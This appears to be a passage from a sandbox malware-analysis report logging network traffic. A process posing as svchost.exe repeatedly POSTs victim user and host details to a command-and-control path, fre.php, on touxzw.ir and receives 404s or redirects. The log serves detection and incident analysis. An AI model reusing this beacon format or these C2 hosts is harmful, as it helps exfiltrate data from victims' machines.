Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50029	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:54.876337051 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:54.881380081 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:55.591232061 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fk7K3ksphLqXuWzK0jS24iTB%2F048o0OSX7pMUb5D17ckQEThyM%2BmnMfhBkDJLsvllTpfiFV7WEmhe2%2F%2BoB1pWOvg%2BNYyjZgbQfnoXu95tte2AQJrt6T44DHav5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10d27c94335a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1928&rtt_var=964&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50030	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:56.767504930 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:56.772588015 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:57.503592968 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:57 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVCYcW5Ssp9473M%2BGS9oCbq2VMgA3E0N4M50AZv9Q2SWZLzQldBviLN2ixsRg0x7Z46J9K%2FkwxxtMzSr%2FKaIUw1ZIhtykbo9Z5L%2BcloClvpy3UPlAkKTon%2BymhM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10de5ae417e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50031	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:58.674216032 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:58.679413080 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:59.610399008 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jy%2FT%2BYtbpRmCjQxh5vKdm7I8L6%2Bw9DazA6MvHh0nOe0CNw7gcJFmV3tCaqGNDY3sXhIJ7IoeLcZiVOr75hujUPpXg%2BuZHbNBEdHFIa%2Bi6MwC7ZqrHhqvDazSBYw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10ea4ee8433e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50032	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:00.789520025 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:00.794677973 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:01.538141012 CET	823	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:01 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZYOnhR0Yx5NLVFGhK3r%2Bih7XRvy0nDITyzUAT5I7kaDzcSFrUjW26mWgbY5VMCIoGy8TU7nRML1agAfl7FQIcLxj%2BK5QR7wb%2BAxUwhS7AOuCV%2FQlLmcelovjoU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10f77d387289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=2085&rtt_var=1042&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50033	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:02.733177900 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:02.738306046 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:03.583019972 CET	853	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wp%2F%2BBx3M2kGPkDREah%2BuZUjvxG4iEW4x%2FO%2FpkE%2Fs6GUfW0DOXV6CWIwNYdJWgG%2FJkNNU9wmwONc279DLZwR0BLoU79dVsAGTEbiMs2GRwdw%2BO4WmCL0SGCLR7mE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1103bb662363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2043&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50034	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:04.742496014 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:04.747632027 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:05.507750988 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tyxcWMyBNruPt4jPgxyoLfNS5PW6QXzF12UQxR3ybeS%2B3IgghaGHJILx0c8OJ3IOK7EmTUUKkjjh8QZvwBCMaVTQKLeC2pb%2FgcJuWsVeg5mDwIWlAFfaNod%2FX0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11102fbdc32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	50036	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:06.684638977 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:06.689666986 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:07.579685926 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4prgj4vmP%2FBqbgfpd%2F2QaK1w0KDx%2FMpxstnZjLrO%2B2Uxvm16fBe968c%2BQP0wPVKX1PzjJBov%2BA7G2kHFTGA732jDDItSzCn2sOYpD70LiZS2d9lQOx8m5mwZYM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f111c5cee5e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	50037	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:08.761281967 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:08.766511917 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:09.582328081 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:09 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADGHjLIrDAp96uObg2UH3DO0N8pATLRxmDnv3CcHNj0DCTx2dwr5HCBU4mqcEoJqrG88Cbbt1FXKYDxNymjBanSASO%2FnV%2BQH0Qx3X95K6Y4SGGH5em6sipyWPAo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11295bd50f7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	50038	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:10.746460915 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:10.754451990 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:11.586926937 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOpFsCUuwvCmZRousqGfoin1Lhb1nwCctbl6veEKpJ5DaSINNV3Vb0ho%2B72y3NAoNX%2B8Eaz%2F814i6skbkLOSLpH8C6pxBImsAGaPxQbsemDybI4slUD1dsBM0eQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1135bd48c339-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	50039	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:12.764056921 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:12.769110918 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:13.585680008 CET	852	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpr%2FP%2BED8VaU1lOHtHFE2J23BngsOHgMFXPrYrPuKeE4RMlr%2Bqj%2Bg0KijZoUIO7%2F9tTF478jZ52xJW9TWLYUfSyuVhK%2F7QOJAp5yD9az3Zz%2Fc%2BvJGSC3bgtRcoE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11424f7eefa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=976&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	50040	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:14.744368076 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:14.749378920 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:15.626003027 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGmdSZgxRuFOFeMOEdJBgHc%2FjetuQiqn2Hi%2FbPqikfRDuWxHlfW%2FgyjcHktq70Ki9YuuyOLHVPeNTPz87vqcLzZ8POng0rCFi2EjmBA3kdUfnBWXHORCKLmLUsU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f114eb9dec3fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1661&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	50041	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:16.787025928 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:16.794399023 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:17.604955912 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3heaPNOqSOIToDd7kH0Xry8ErVJDB70OeLtfBvaAf%2FpLp1eqNn6AwZaunYK25V5cbxSX59XWkbTZNOzx7BqrDfJK3mVF4k482VLXnj4YeQmJPkFTDxp%2Fu%2BWXTZQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f115b7cb9c352-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	50042	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:18.766771078 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:18.771826982 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:19.519537926 CET	823	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:19 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBLLfZKB4PC%2BRIo0itxLv%2FhZgeTm%2Fmmi3WHSnOFFtFuQRUPPMvpAaWq6B12guLMNuz653v2XxvFtc78iEVUCuzPxOoKc163Zc6ZKRRe0i%2FlxuDR2f6h0XcWLO8g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1167dcf678d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2041&rtt_var=1020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	50043	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:20.699160099 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:20.704781055 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
